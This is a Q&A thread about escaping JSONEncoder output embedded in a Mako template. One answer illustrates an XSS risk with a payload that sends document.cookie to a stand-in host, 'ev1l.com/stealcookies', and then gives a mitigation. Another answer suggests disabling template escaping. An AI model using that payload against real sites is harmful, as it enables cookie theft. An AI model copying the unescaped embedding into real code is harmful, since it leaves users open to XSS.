" appears in JSONEncoder output, input is Python list of strings

Question

I'm reading a text file, splitting it on \n and putting the results in a Python list.

I'm then using JSONEncoder().encode(mylist), but the result throws errors as it produces the javascript:

var jslist = ["List item 1", "List item 2"]

I'm guessing switching to single quotes would solve this, but it's unclear how to force JSONEncoder/python to use one or the other.

Update: The context is a pyramid application, here's the end of the function (components is the name of the list:

return {'components': JSONEncoder().encode(components)}

and then in the mako template:

var components = ${components};

which is being replaced as above.

Answer 1

If you are embedding the JSON on a HTML page, beware. As Mako does not know about script tags, so it goes on to escape the string using the standard escapes. However a <script> tag has different escaping rules. Notably, NOT escaping makes your site prone to Cross-Site Scripting attacks if the JSON contains user-generated data. Consider the following info in User-editable field (user.name)

 user.name = "</script><script language='javascript'>" +
     "document.write('<img src=\'http://ev1l.com/stealcookies/?'" +
     "+ document.cookie + '/>');</script><script language='vbscript'>"

Alas, Python JSON encoder does not have an option for safely encoding JSON so that it is embeddable within HTML - or even Javascript (a bug has been entered into Python bug db). Meanwhile you should use ensure_ascii=True + replace all '<' with '\\u003c' to avoid hacking by malicious users.

Answer 2

mako is escaping your strings because it's a sane default for most purposes. You can turn off the escaping on a case-by-case basis:

${components | n}